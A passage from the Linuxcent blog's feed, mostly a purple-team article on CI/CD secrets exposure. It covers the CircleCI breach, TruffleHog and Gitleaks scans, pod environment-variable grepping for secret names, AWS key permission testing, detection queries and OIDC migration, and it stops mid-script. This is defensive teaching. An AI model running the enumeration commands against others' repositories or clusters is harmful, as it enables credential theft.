<li>Kernel-level process events cannot be suppressed by a compromised container process — an attacker with root inside the container still cannot prevent bpftrace or Tetragon running on the host from recording their syscalls</li>
</ul>
<hr />
<h2 id="whats-next">What&#8217;s Next</h2>
<p>EP14 is the payoff episode for the entire series arc so far. You&#8217;ve seen programs load (EP04), maps hold state (EP05), CO-RE keep programs portable (EP06), XDP and TC enforce at the network layer (EP07, EP08), bpftrace ask one-off questions (EP09), and the observability stack collect flow, DNS, and process data continuously (EP10, EP11, EP12, EP13).</p>
<p>EP14 synthesises all of it into four commands that tell you everything about any cluster you&#8217;ve never seen before — any eBPF-based tool, any vendor, any configuration. The audit playbook is what you run in the first 10 minutes when you inherit a cluster and need to understand what&#8217;s enforcing policy at the kernel level before you can trust anything it tells you.</p>
<p><em>Next: <a href="/ebpf-audit-playbook/">the audit playbook — four commands to see any cluster</a></em></p>
<p>Get EP14 in your inbox when it publishes → <a href="https://linuxcent.com/subscribe">linuxcent.com/subscribe</a></p>
<p><a class="a2a_button_mastodon" href="https://www.addtoany.com/add_to/mastodon?linkurl=https%3A%2F%2Flinuxcent.com%2Febpf-process-lineage-incident-response%2F&amp;linkname=Process%20Lineage%20%E2%80%94%20Reconstructing%20What%20Happened%20After%20the%20Fact" title="Mastodon" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_email" href="https://www.addtoany.com/add_to/email?linkurl=https%3A%2F%2Flinuxcent.com%2Febpf-process-lineage-incident-response%2F&amp;linkname=Process%20Lineage%20%E2%80%94%20Reconstructing%20What%20Happened%20After%20the%20Fact" title="Email" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_whatsapp" href="https://www.addtoany.com/add_to/whatsapp?linkurl=https%3A%2F%2Flinuxcent.com%2Febpf-process-lineage-incident-response%2F&amp;linkname=Process%20Lineage%20%E2%80%94%20Reconstructing%20What%20Happened%20After%20the%20Fact" title="WhatsApp" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_reddit" href="https://www.addtoany.com/add_to/reddit?linkurl=https%3A%2F%2Flinuxcent.com%2Febpf-process-lineage-incident-response%2F&amp;linkname=Process%20Lineage%20%E2%80%94%20Reconstructing%20What%20Happened%20After%20the%20Fact" title="Reddit" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_x" href="https://www.addtoany.com/add_to/x?linkurl=https%3A%2F%2Flinuxcent.com%2Febpf-process-lineage-incident-response%2F&amp;linkname=Process%20Lineage%20%E2%80%94%20Reconstructing%20What%20Happened%20After%20the%20Fact" title="X" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_linkedin" href="https://www.addtoany.com/add_to/linkedin?linkurl=https%3A%2F%2Flinuxcent.com%2Febpf-process-lineage-incident-response%2F&amp;linkname=Process%20Lineage%20%E2%80%94%20Reconstructing%20What%20Happened%20After%20the%20Fact" title="LinkedIn" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_copy_link" href="https://www.addtoany.com/add_to/copy_link?linkurl=https%3A%2F%2Flinuxcent.com%2Febpf-process-lineage-incident-response%2F&amp;linkname=Process%20Lineage%20%E2%80%94%20Reconstructing%20What%20Happened%20After%20the%20Fact" title="Copy Link" rel="nofollow noopener" target="_blank"></a><a class="a2a_dd addtoany_share_save addtoany_share" href="https://www.addtoany.com/share#url=https%3A%2F%2Flinuxcent.com%2Febpf-process-lineage-incident-response%2F&#038;title=Process%20Lineage%20%E2%80%94%20Reconstructing%20What%20Happened%20After%20the%20Fact" data-a2a-url="https://linuxcent.com/ebpf-process-lineage-incident-response/" data-a2a-title="Process Lineage — Reconstructing What Happened After the Fact"></a></p><p>The post <a href="https://linuxcent.com/ebpf-process-lineage-incident-response/">Process Lineage — Reconstructing What Happened After the Fact</a> appeared first on <a href="https://linuxcent.com">Linuxcent</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://linuxcent.com/ebpf-process-lineage-incident-response/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
		<post-id xmlns="com-wordpress:feed-additions:1">1842</post-id>	</item>
		<item>
		<title>CI/CD Secrets Exposure: How Supply Chain Attacks Target Your Pipeline</title>
		<link>https://linuxcent.com/cicd-secrets-exposure-supply-chain/</link>
					<comments>https://linuxcent.com/cicd-secrets-exposure-supply-chain/#respond</comments>
		
		<dc:creator><![CDATA[Vamshi Krishna Santhapuri]]></dc:creator>
		<pubDate>Tue, 16 Jun 2026 02:00:00 +0000</pubDate>
				<category><![CDATA[Purple Team]]></category>
		<category><![CDATA[CI/CD]]></category>
		<category><![CDATA[CircleCI]]></category>
		<category><![CDATA[DevSecOps]]></category>
		<category><![CDATA[GitHub Actions]]></category>
		<category><![CDATA[Secrets Management]]></category>
		<category><![CDATA[Supply Chain Security]]></category>
		<guid isPermaLink="false">https://linuxcent.com/?p=1858</guid>

					<description><![CDATA[<p><span class="span-reading-time rt-reading-time" style="display: block;"><span class="rt-label rt-prefix">Reading Time: </span> <span class="rt-time"> 11</span> <span class="rt-label rt-postfix">minutes</span></span>CI/CD secrets exposure is structural, not behavioral. How CircleCI and GitHub Actions breaches happened and how pre-commit hooks plus secrets scanning close the path permanently.</p>
<p>The post <a href="https://linuxcent.com/cicd-secrets-exposure-supply-chain/">CI/CD Secrets Exposure: How Supply Chain Attacks Target Your Pipeline</a> appeared first on <a href="https://linuxcent.com">Linuxcent</a>.</p>
]]></description>
										<content:encoded><![CDATA[<span class="span-reading-time rt-reading-time" style="display: block;"><span class="rt-label rt-prefix">Reading Time: </span> <span class="rt-time"> 11</span> <span class="rt-label rt-postfix">minutes</span></span><style>
pre{position:relative;background:#1e1e1e;color:#d4d4d4;
    padding:16px 16px 16px 20px;border-radius:6px;overflow-x:auto;
    font-family:'JetBrains Mono','Fira Code','Cascadia Code',Consolas,'Courier New',monospace;
    font-size:.88em;line-height:1.6;border-left:4px solid #555}
code{background:#f4f4f4;padding:2px 5px;border-radius:3px;font-size:.9em}
pre code{background:transparent;padding:0;color:inherit}
pre[data-lang="bash"],pre[data-lang="sh"],
pre[data-lang="shell"],pre[data-lang="zsh"]{border-left-color:#4ec9b0}
pre[data-lang="yaml"],pre[data-lang="json"],
pre[data-lang="toml"],pre[data-lang="xml"]{border-left-color:#569cd6}
pre[data-lang="python"],pre[data-lang="go"],pre[data-lang="rust"],
pre[data-lang="java"],pre[data-lang="c"],pre[data-lang="cpp"]{border-left-color:#c586c0}
pre[data-lang="text"],pre[data-lang="output"],
pre[data-lang="console"]{border-left-color:#888}
.lc-copy-btn{position:absolute;top:8px;right:8px;background:#2d2d2d;color:#ccc;
    border:1px solid #444;border-radius:4px;padding:3px 9px;font-size:.75em;
    font-family:system-ui,sans-serif;cursor:pointer;opacity:0;
    transition:opacity .15s,background .15s;line-height:1.6}
pre:hover .lc-copy-btn{opacity:1}
.lc-copy-btn:hover{background:#3a3a3a;color:#fff}
.lc-copy-btn.copied{color:#4ec9b0;border-color:#4ec9b0}
.lc-lang-badge{position:absolute;top:8px;left:20px;font-family:system-ui,sans-serif;
    font-size:.7em;color:#666;text-transform:uppercase;letter-spacing:.04em;
    line-height:1;pointer-events:none;opacity:0;transition:opacity .15s}
pre:hover .lc-lang-badge{opacity:1}
table{border-collapse:collapse;width:100%;margin:16px 0}
th,td{border:1px solid #ddd;padding:10px 14px;text-align:left}
th{background:#f0f0f0;font-weight:600}
tr:nth-child(even){background:#fafafa}
</style>
<p><script>
(function(){
  if(window.__lcCodeEnhanced)return;
  window.__lcCodeEnhanced=true;
  function enhance(){
    document.querySelectorAll('pre').forEach(function(pre){
      var code=pre.querySelector('code');
      var lang='';
      if(code){var m=(code.className||'').match(/language-(\S+)/);if(m)lang=m[1].toLowerCase();}
      if(lang)pre.setAttribute('data-lang',lang);
      if(lang){var badge=document.createElement('span');badge.className='lc-lang-badge';badge.textContent=lang;pre.insertBefore(badge,pre.firstChild);}
      var btn=document.createElement('button');
      btn.className='lc-copy-btn';btn.textContent='Copy';btn.setAttribute('aria-label','Copy code to clipboard');
      pre.appendChild(btn);
      btn.addEventListener('click',function(){
        var text=code?code.innerText:pre.innerText;
        if(navigator.clipboard&&window.isSecureContext){
          navigator.clipboard.writeText(text).then(function(){ok(btn);}).catch(function(){fb(text,btn);});
        }else{fb(text,btn);}
      });
    });
  }
  function ok(btn){btn.textContent='Copied!';btn.classList.add('copied');setTimeout(function(){btn.textContent='Copy';btn.classList.remove('copied');},2000);}
  function fb(text,btn){
    try{var ta=document.createElement('textarea');ta.value=text;ta.style.cssText='position:fixed;left:-9999px;top:-9999px;opacity:0';document.body.appendChild(ta);ta.select();document.execCommand('copy');document.body.removeChild(ta);ok(btn);}
    catch(e){btn.textContent='✗ Failed';setTimeout(function(){btn.textContent='Copy';},2000);}
  }
  if(document.readyState==='loading'){document.addEventListener('DOMContentLoaded',enhance);}else{enhance();}
})();
</script></p>
<p><a href="/what-is-purple-team-security/">What is purple team security</a> → <a href="/owasp-top-10-cloud-infrastructure/">OWASP Top 10 mapped to cloud infrastructure</a> → <a href="/cloud-security-breaches-2020-2025/">Cloud security breaches 2020–2025</a> → <a href="/broken-access-control-aws/">Broken access control in AWS</a> → <a href="/mfa-fatigue-attack/">MFA fatigue attacks</a> → <strong>CI/CD secrets exposure</strong></p>
<hr />
<h2 id="tldr">TL;DR</h2>
<ul>
<li><strong>CI/CD secrets exposure</strong> is OWASP A08 + A02: credentials committed to repositories or stored in pipeline environment variables can be exfiltrated when the platform is compromised, and automated scanners find them within seconds of a public commit</li>
<li>The CircleCI breach (January 2023): an engineer&#8217;s laptop was compromised via malware → session token stolen → attacker accessed CircleCI production systems → all customer environment variables (AWS keys, GitHub tokens, SSH keys) exfiltrated</li>
<li>The structural problem: long-lived credentials stored in a CI/CD platform are only as secure as the platform itself — if the platform is compromised, all stored secrets are compromised</li>
<li>The structural fix: <a href="/oidc-workload-identity-eliminate-cloud-access-keys/">OIDC workload identity</a> replaces stored credentials with short-lived tokens issued at job runtime — there is nothing to exfiltrate</li>
<li>Pre-commit hooks and CI-layer secret scanning are detection layers, not structural fixes — they catch accidents, not determined attackers</li>
<li>Automated secret scanners (TruffleHog, Gitleaks) find credentials in public repos within 60–90 seconds of commit</li>
</ul>
<hr />
<blockquote>
<p><strong>OWASP Mapping:</strong> A08 Software and Data Integrity Failures — build pipeline integrity. A02 Cryptographic Failures — secrets stored in ways that allow exfiltration.</p>
</blockquote>
<hr />
<h2 id="the-big-picture">The Big Picture</h2>
<pre><code class="" data-line="">┌─────────────────────────────────────────────────────────────────────┐
│                  CI/CD SECRETS ATTACK SURFACE                       │
│                                                                     │
│   VECTOR 1: COMMITTED TO VCS                                        │
│   Developer ── git commit ──&#x25b6; .env with AWS_SECRET_KEY              │
│   Automated scanner ──────&#x25b6;  clones within 60 seconds              │
│   Attacker ───────────────&#x25b6;  accesses AWS before dev notices        │
│                                                                     │
│   VECTOR 2: STORED IN CI/CD PLATFORM                                │
│   DevOps ─── configures ──&#x25b6;  AWS_ACCESS_KEY_ID in CircleCI         │
│   Attacker compromises CircleCI → exfiltrates all org env vars      │
│                                                                     │
│   VECTOR 3: IN CONTAINER/PROCESS ENV                                │
│   kubectl exec / docker inspect ──&#x25b6;  printenv shows credentials     │
│   Anyone with container exec access = credential access             │
│                                                                     │
│   VECTOR 4: IN BUILD ARTIFACTS / LOGS                               │
│   Build log: &quot;Using token: ghp_xxxxxxxxxxxx...&quot; → exposed in log   │
│                                                                     │
│   ═══════════════════════════════════════════════════════           │
│   STRUCTURAL FIX: OIDC WORKLOAD IDENTITY                            │
│   No stored credential → nothing to commit, nothing to exfiltrate  │
│   CI job requests token at runtime → 1-hour TTL → expired          │
│                                                                     │
└─────────────────────────────────────────────────────────────────────┘
</code></pre>
<p><strong>CI/CD secrets exposure</strong> is not primarily a developer discipline problem — it is a structural problem. When credentials are stored in a CI/CD platform, in environment variables, or in version control, the only question is when they will be exposed, not whether. The structural answer replaces stored credentials with dynamically issued, short-lived tokens that cannot be exfiltrated because they don&#8217;t persist.</p>
<hr />
<h2 id="the-25-minute-compromise-how-automated-scanning-works-against-you">The 25-Minute Compromise: How Automated Scanning Works Against You</h2>
<p>At 2:47 AM, a developer committed a <code class="" data-line="">.env</code> file to a public GitHub repository. It contained:</p>
<pre><code class="" data-line="">DATABASE_URL=postgres://admin:prod_p@ssw0rd@db.internal.company.com:5432/customers
AWS_ACCESS_KEY_ID=AKIAIOSFODNN7EXAMPLE
AWS_SECRET_ACCESS_KEY=wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY
STRIPE_SECRET_KEY=sk_live_xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
GITHUB_TOKEN=ghp_xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
</code></pre>
<p>At 2:48 AM — 60 seconds later — an automated scanner had cloned the repository. These scanners run continuously against GitHub&#8217;s public event stream, looking for credential patterns in new commits, new files, and new repository forks.</p>
<p>At 3:12 AM — 25 minutes after the commit — the database started receiving unusual queries. The automated scanning infrastructure is not operated by individuals manually watching for leaks. It is fully automated: pattern match → clone → test credential validity → if valid, begin exploitation or sell.</p>
<p>GitHub now runs its own secret scanning and immediately invalidates some credential types (GitHub tokens, AWS IAM keys partnered with AWS) when detected in public repositories. This covers a subset of credential types. It does not cover database passwords, service-specific tokens for non-partnered services, or private repository commits that become public via fork.</p>
<hr />
<h2 id="the-circleci-breach-platform-level-credential-exfiltration">The CircleCI Breach: Platform-Level Credential Exfiltration</h2>
<p>The CircleCI breach (January 2023) is the definitive example of CI/CD platform-level secrets exposure. The attack chain:</p>
<pre><code class="" data-line="">1. CircleCI engineer&#039;s laptop compromised via malware (initial vector not fully disclosed)
2. Malware steals a 2FA-authenticated SSO session token
3. Session token valid, not expired
4. Attacker uses session token to authenticate to CircleCI internal systems
5. From internal access, attacker reaches production database
6. Production database contains encrypted customer secrets (environment variables)
7. Database also contains the encryption keys (in accessible internal system)
8. Attacker exfiltrates: encrypted secrets + encryption keys = plaintext secrets
</code></pre>
<p><strong>What was stored in CircleCI environment variables by customers:</strong><br />
&#8211; AWS IAM access key ID and secret access key pairs<br />
&#8211; GitHub personal access tokens and OAuth tokens<br />
&#8211; DockerHub credentials<br />
&#8211; SSH private keys (for deployment access)<br />
&#8211; Heroku API keys<br />
&#8211; Stripe, Twilio, SendGrid API keys<br />
&#8211; Internal service account credentials</p>
<p>CircleCI could not determine which customer secrets were accessed and which were not — they notified all customers to rotate all credentials stored in their system.</p>
<p><strong>The scale of the blast radius:</strong> Any customer who had stored long-lived credentials in CircleCI environment variables was potentially compromised. The credential was valid. The CircleCI platform&#8217;s encryption only protected against offline attacks — an attacker with internal database access and access to the key management system had everything needed to decrypt.</p>
<hr />
<h2 id="red-phase-enumerating-secrets-exposure-in-your-pipeline">Red Phase: Enumerating Secrets Exposure in Your Pipeline</h2>
<h3 id="scanning-repositories-for-committed-secrets">Scanning Repositories for Committed Secrets</h3>
<pre><code class="" data-line=""># Install: pip install trufflehog3 or use the Docker image
docker run --rm \
  -v &quot;$(pwd):/repo&quot; \
  trufflesecurity/trufflehog:latest \
  git file:///repo \
  --json \
  --only-verified \
  2&gt;/dev/null | \
  jq &#039;{
    file: .SourceMetadata.Data.Git.file,
    commit: .SourceMetadata.Data.Git.commit,
    detector: .DetectorName,
    verified: .Verified,
    line: .SourceMetadata.Data.Git.line
  }&#039;
</code></pre>
<pre><code class="" data-line=""># Gitleaks: alternative scanner with SARIF output for CI integration
gitleaks detect \
  --source . \
  --report-format sarif \
  --report-path gitleaks-report.sarif \
  --verbose

# Or: scan entire git history (catches secrets that were committed then deleted)
gitleaks detect \
  --source . \
  --log-opts=&quot;--all&quot; \
  --report-format json \
  --report-path gitleaks-history.json
</code></pre>
<pre><code class="" data-line=""># Scan a specific GitHub organization&#039;s public repositories
# (test your own org before red team exercises)
trufflehog github \
  --org your-github-org \
  --token &quot;${GITHUB_TOKEN}&quot; \
  --json \
  --only-verified \
  2&gt;/dev/null | \
  jq &#039;{
    repo: .SourceMetadata.Data.Github.repository,
    file: .SourceMetadata.Data.Github.file,
    detector: .DetectorName,
    verified: .Verified
  }&#039;
</code></pre>
<h3 id="enumerating-secrets-in-cicd-platform-environment-variables">Enumerating Secrets in CI/CD Platform Environment Variables</h3>
<pre><code class="" data-line=""># GitHub Actions: list secrets defined in a repository
# (shows names only — values are not returned by API, but names reveal what&#039;s stored)
curl -H &quot;Authorization: Bearer ${GITHUB_TOKEN}&quot; \
  -H &quot;Accept: application/vnd.github+json&quot; \
  &quot;https://api.github.com/repos/your-org/your-repo/actions/secrets&quot; | \
  jq &#039;.secrets[] | {name: .name, updated: .updated_at}&#039;

# GitHub Actions: list organization-level secrets
curl -H &quot;Authorization: Bearer ${GITHUB_TOKEN}&quot; \
  -H &quot;Accept: application/vnd.github+json&quot; \
  &quot;https://api.github.com/orgs/your-org/actions/secrets&quot; | \
  jq &#039;.secrets[] | {name: .name, visibility: .visibility, updated: .updated_at}&#039;
</code></pre>
<pre><code class="" data-line=""># Check for credentials in running pod environment variables (Kubernetes)
# This is what an attacker with kubectl exec access would do
kubectl get pods -A -o json | \
  jq -r &#039;.items[] | 
    .metadata.namespace + &quot;/&quot; + .metadata.name + &quot;: &quot; + 
    ([.spec.containers[].env[]? | 
      select(.name | test(&quot;KEY|SECRET|TOKEN|PASSWORD|CREDENTIAL|API&quot;; &quot;i&quot;)) |
      .name
    ] | join(&quot;, &quot;))&#039; | \
  grep -v &quot;: $&quot;  # Only show pods with matching env var names
</code></pre>
<h3 id="testing-whether-aws-keys-in-cicd-are-over-permissioned">Testing Whether AWS Keys in CI/CD Are Over-Permissioned</h3>
<pre><code class="" data-line=""># If you find an AWS access key in a scan — test its permissions
# (on your own test account&#039;s keys only)
aws sts get-caller-identity
# Returns: account, user/role ARN, caller ID

# What can this key do?
aws iam simulate-principal-policy \
  --policy-source-arn $(aws sts get-caller-identity --query Arn --output text) \
  --action-names &quot;s3:*&quot; &quot;ec2:*&quot; &quot;iam:*&quot; &quot;sts:AssumeRole&quot; \
  --query &#039;EvaluationResults[?EvalDecision==`allowed`].EvalActionName&#039; \
  --output text
</code></pre>
<hr />
<h2 id="blue-phase-detection-across-the-secret-lifecycle">Blue Phase: Detection Across the Secret Lifecycle</h2>
<h3 id="github-secret-scanning-alerts">GitHub Secret Scanning Alerts</h3>
<pre><code class="" data-line=""># List secret scanning alerts in a repository via GitHub API
curl -H &quot;Authorization: Bearer ${GITHUB_TOKEN}&quot; \
  -H &quot;Accept: application/vnd.github+json&quot; \
  &quot;https://api.github.com/repos/your-org/your-repo/secret-scanning/alerts?state=open&quot; | \
  jq &#039;.[] | {
    type: .secret_type,
    state: .state,
    created: .created_at,
    url: .html_url
  }&#039;
</code></pre>
<h3 id="cloudtrail-detecting-api-activity-from-cicd-credentials">CloudTrail: Detecting API Activity from CI/CD Credentials</h3>
<p>When a CI/CD credential is used by an attacker, the CloudTrail events show unusual patterns:</p>
<pre><code class="" data-line=""># Find API calls from CI/CD credentials outside normal working hours
# or from unexpected IPs (attacker using the stolen key)
aws cloudtrail lookup-events \
  --lookup-attributes AttributeKey=Username,AttributeValue=ci-deploy-user \
  --start-time &quot;$(date -d &#039;7 days ago&#039; --iso-8601=seconds)&quot; \
  --query &#039;Events[].{Time:EventTime,Name:EventName,IP:CloudTrailEvent}&#039; \
  --output json | \
  jq &#039;.[] | {
    time: .Time,
    event: .Name,
    ip: (.IP | fromjson | .sourceIPAddress),
    user_agent: (.IP | fromjson | .userAgent)
  }&#039; | \
  jq &#039;select(.ip | test(&quot;^(10\\.|172\\.(1[6-9]|2[0-9]|3[01])\\.|192\\.168\\.)&quot;) | not)&#039;
  # Filter: events from non-RFC1918 IPs (outside your known CI/CD IP ranges)
</code></pre>
<h3 id="siem-query-credential-used-in-multiple-regions-simultaneously">SIEM Query: Credential Used in Multiple Regions Simultaneously</h3>
<p>A credential being used from multiple regions simultaneously is a strong indicator of compromise:</p>
<pre><code class="" data-line="">-- Athena query against CloudTrail logs
-- Detect: same access key used from multiple regions in same hour
SELECT
  userIdentity.accessKeyId,
  userIdentity.userName,
  COUNT(DISTINCT awsRegion) as region_count,
  ARRAY_AGG(DISTINCT awsRegion) as regions,
  COUNT(DISTINCT sourceIPAddress) as ip_count,
  ARRAY_AGG(DISTINCT sourceIPAddress) as source_ips,
  DATE_TRUNC(&#039;hour&#039;, from_iso8601_timestamp(eventTime)) as hour
FROM cloudtrail_logs
WHERE
  userIdentity.type = &#039;IAMUser&#039;
  AND from_iso8601_timestamp(eventTime) &gt; current_timestamp - interval &#039;7&#039; day
GROUP BY
  userIdentity.accessKeyId,
  userIdentity.userName,
  DATE_TRUNC(&#039;hour&#039;, from_iso8601_timestamp(eventTime))
HAVING COUNT(DISTINCT awsRegion) &gt; 2
ORDER BY region_count DESC;
</code></pre>
<h3 id="guardduty-credential-exfiltration-indicators">GuardDuty: Credential Exfiltration Indicators</h3>
<pre><code class="" data-line=""># GuardDuty findings relevant to CI/CD credential compromise
DETECTOR_ID=$(aws guardduty list-detectors --query &#039;DetectorIds[0]&#039; --output text)

aws guardduty list-findings \
  --detector-id &quot;${DETECTOR_ID}&quot; \
  --finding-criteria &#039;{
    &quot;Criterion&quot;: {
      &quot;type&quot;: {
        &quot;Equals&quot;: [
          &quot;UnauthorizedAccess:IAMUser/TorIPCaller&quot;,
          &quot;UnauthorizedAccess:IAMUser/MaliciousIPCaller&quot;,
          &quot;Discovery:IAMUser/AnomalousBehavior&quot;,
          &quot;Exfiltration:IAMUser/AnomalousBehavior&quot;,
          &quot;CredentialAccess:IAMUser/AnomalousBehavior&quot;
        ]
      }
    }
  }&#039; \
  --query &#039;FindingIds&#039; --output text | \
  xargs -n 10 aws guardduty get-findings \
    --detector-id &quot;${DETECTOR_ID}&quot; \
    --finding-ids | \
  jq &#039;.Findings[] | {type: .Type, user: .Resource.AccessKeyDetails.UserName, severity: .Severity}&#039;
</code></pre>
<hr />
<h2 id="purple-phase-the-structural-fix">Purple Phase: The Structural Fix</h2>
<h3 id="fix-1-oidc-workload-identity-eliminate-stored-credentials">Fix 1: OIDC Workload Identity — Eliminate Stored Credentials</h3>
<p>This is the structural solution. Instead of storing an AWS IAM access key in your CI/CD platform, the CI/CD job authenticates to AWS using an OIDC token issued by the CI/CD provider. AWS validates the token against a pre-configured trust policy and issues temporary credentials valid for the duration of the job.</p>
<p>The <a href="/oidc-workload-identity-eliminate-cloud-access-keys/">OIDC workload identity approach eliminates static cloud access keys</a> entirely — there is no secret to commit, no secret to exfiltrate from the CI/CD platform, and no long-lived credential to rotate on breach.</p>
<p><strong>GitHub Actions with AWS OIDC — complete setup:</strong></p>
<pre><code class="" data-line=""># .github/workflows/deploy.yml
name: Deploy to AWS

on:
  push:
    branches: [main]

permissions:
  id-token: write   # Required for OIDC token request
  contents: read

jobs:
  deploy:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4

      - name: Configure AWS credentials via OIDC
        uses: aws-actions/configure-aws-credentials@v4
        with:
          role-to-assume: arn:aws:iam::123456789012:role/github-actions-deploy-role
          role-session-name: github-actions-${{ github.run_id }}
          aws-region: us-east-1
          # No AWS_ACCESS_KEY_ID or AWS_SECRET_ACCESS_KEY needed

      - name: Deploy
        run: aws s3 sync ./dist s3://your-bucket/
</code></pre>
<p><strong>AWS IAM trust policy for GitHub Actions OIDC:</strong></p>
<pre><code class="" data-line="">{
  &quot;Version&quot;: &quot;2012-10-17&quot;,
  &quot;Statement&quot;: [
    {
      &quot;Effect&quot;: &quot;Allow&quot;,
      &quot;Principal&quot;: {
        &quot;Federated&quot;: &quot;arn:aws:iam::123456789012:oidc-provider/token.actions.githubusercontent.com&quot;
      },
      &quot;Action&quot;: &quot;sts:AssumeRoleWithWebIdentity&quot;,
      &quot;Condition&quot;: {
        &quot;StringEquals&quot;: {
          &quot;token.actions.githubusercontent.com:aud&quot;: &quot;sts.amazonaws.com&quot;
        },
        &quot;StringLike&quot;: {
          &quot;token.actions.githubusercontent.com:sub&quot;: &quot;repo:your-org/your-repo:ref:refs/heads/main&quot;
        }
      }
    }
  ]
}
</code></pre>
<pre><code class="" data-line=""># Create the OIDC provider in AWS (one-time setup)
aws iam create-open-id-connect-provider \
  --url https://token.actions.githubusercontent.com \
  --client-id-list sts.amazonaws.com \
  --thumbprint-list &quot;6938fd4d98bab03faadb97b34396831e3780aea1&quot;

# Create the IAM role with the trust policy above
aws iam create-role \
  --role-name github-actions-deploy-role \
  --assume-role-policy-document file://github-actions-trust-policy.json

# Attach a least-privilege policy to the role
aws iam attach-role-policy \
  --role-name github-actions-deploy-role \
  --policy-arn arn:aws:iam::123456789012:policy/deploy-policy
</code></pre>
<h3 id="fix-2-pre-commit-hooks-catch-accidents-before-they-reach-vcs">Fix 2: Pre-Commit Hooks — Catch Accidents Before They Reach VCS</h3>
<p>Pre-commit hooks don&#8217;t stop a determined attacker. They catch accidents — the developer who forgets to move a <code class="" data-line="">.env</code> file to <code class="" data-line="">.gitignore</code> before staging all files.</p>
<pre><code class="" data-line=""># Install pre-commit framework
pip install pre-commit

# .pre-commit-config.yaml in your repository root
cat &gt; .pre-commit-config.yaml &lt;&lt; &#039;EOF&#039;
repos:
  - repo: https://github.com/gitleaks/gitleaks
    rev: v8.18.4
    hooks:
      - id: gitleaks
        name: Detect hardcoded secrets
        entry: gitleaks protect --staged --redact --verbose
        language: golang
        pass_filenames: false

  - repo: https://github.com/pre-commit/pre-commit-hooks
    rev: v4.5.0
    hooks:
      - id: detect-private-key
      - id: check-added-large-files
        args: [&#039;--maxkb=1000&#039;]
EOF

# Install the hooks in the local repository
pre-commit install

# Test against staged files
pre-commit run --all-files
</code></pre>
<h3 id="fix-3-ci-layer-secret-scanning-block-before-merge">Fix 3: CI-Layer Secret Scanning — Block Before Merge</h3>
<pre><code class="" data-line=""># GitHub Actions: secret scanning as a required status check
# .github/workflows/secret-scan.yml
name: Secret Scan

on:
  pull_request:
    types: [opened, synchronize]

jobs:
  secret-scan:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
        with:
          fetch-depth: 0  # Full history for git log scanning

      - name: Run TruffleHog
        uses: trufflesecurity/trufflehog@main
        with:
          path: ./
          base: ${{ github.event.repository.default_branch }}
          head: HEAD
          extra_args: --only-verified --json
</code></pre>
<pre><code class="" data-line=""># GitLab CI: secret detection built-in template
include:
  - template: Security/Secret-Detection.gitlab-ci.yml

secret_detection:
  stage: test
  variables:
    SECRET_DETECTION_HISTORIC_SCAN: &quot;true&quot;  # Scan full history
</code></pre>
<h3 id="fix-4-audit-and-rotate-existing-cicd-platform-secrets">Fix 4: Audit and Rotate Existing CI/CD Platform Secrets</h3>
<p>After implementing OIDC, the migration path for existing stored credentials:</p>
<pre><code class="" data-line="">#!/bin/bash
# Purple Team EP06 — CI/CD Secrets Migration Audit
# Identifies AWS IAM keys stored in CI/CD that should be replaced with OIDC

echo &quot;=== AWS IAM Keys Potentially Stored in CI/CD ===&quot;
echo &quot;--- Keys not used from expected CI/CD IPs in last 30 days ---&quot;

# Get all IAM access keys
aws iam list-users --query &#039;Users[].UserName&#039; --output text | tr &#039;\t&#039; &#039;\n&#039; | \
  while read user; do
    keys=$(aws iam list-access-keys --user-name &quot;$user&quot; \
      --query &#039;AccessKeyMetadata[?Status==`Active`].{Key:AccessKeyId,Created:CreateDate}&#039; \
      --output json)

    if [ &quot;$(echo &quot;$keys&quot; | jq length)&quot; -gt 0 ]; then
      echo &quot;&quot;
      echo &quot;User: $user&quot;
      echo &quot;$keys&quot; | jq -r &#039;.[] | &quot;  Key: &quot; + .Key + &quot; | Created: &quot; + .Created&#039;

      # Check last used
      echo &quot;$keys&quot; | jq -r &#039;.[].Key&#039; | while read key_id; do
        last_used=$(aws iam get-access-key-last-used --access-key-id &quot;$key_id&quot; \
          --query &#039;AccessKeyLastUsed.{Date:LastUsedDate,Service:ServiceName,Region:Region}&#039; \
          --output json)
        echo &quot;  Last used: $(echo &quot;$last_used&quot; | jq -r &#039;.Date // &quot;Never&quot;&#039;) | Service: $(echo &quot;$last_used&quot; | jq -r &#039;.Service // &quot;N/A&quot;&#039;)&quot;
      done
    fi
  done

echo &quot;&quot;
echo &quot;=== MIGRATION CHECKLIST ===&quot;
echo &quot;  1. For each CI/CD IAM key above:&quot;
echo &quot;     a. Identify which CI/CD platform uses it&quot;
echo &quot;     b. Set up OIDC trust policy for that platform&quot;
echo &quot;     c. Update pipeline to use OIDC (no stored key)&quot;
echo &quot;     d. Disable and then delete the IAM key&quot;
echo &quot;     e. Verify pipelines still work&quot;
</code></pre>
<hr />
<h2 id="run-this-in-your-own-environment-secrets-exposure-audit">Run This in Your Own Environment: Secrets Exposure Audit</h2>
<pre><code class="" data-line="">#!/bin/bash
# Purple Team EP06 — CI/CD Secrets Exposure Audit
# Run from your workstation with git and trufflehog installed

echo &quot;=== 1. Scan Local Repository for Committed Secrets ===&quot;
if command -v trufflehog &gt; /dev/null 2&gt;&amp;1; then
  trufflehog git file://$(pwd) --only-verified --json 2&gt;/dev/null | \
    jq &#039;{file: .SourceMetadata.Data.Git.file, detector: .DetectorName}&#039; || \
    echo &quot;  No verified secrets found in git history&quot;
else
  echo &quot;  Install trufflehog: pip install trufflehog3&quot;
fi

echo &quot;&quot;
echo &quot;=== 2. Check for .env Files in Git History ===&quot;
git log --all --full-history -- &quot;*.env&quot; &quot;**/.env&quot; &quot;.env.*&quot; 2&gt;/dev/null | \
  grep &quot;^commit&quot; | head -5 | \
  while read _ commit; do
    echo &quot;  .env file committed: $commit&quot;
    git show &quot;$commit&quot; --stat | head -3
  done

echo &quot;&quot;
echo &quot;=== 3. Check Running Pods for Credential Env Vars (Kubernetes) ===&quot;
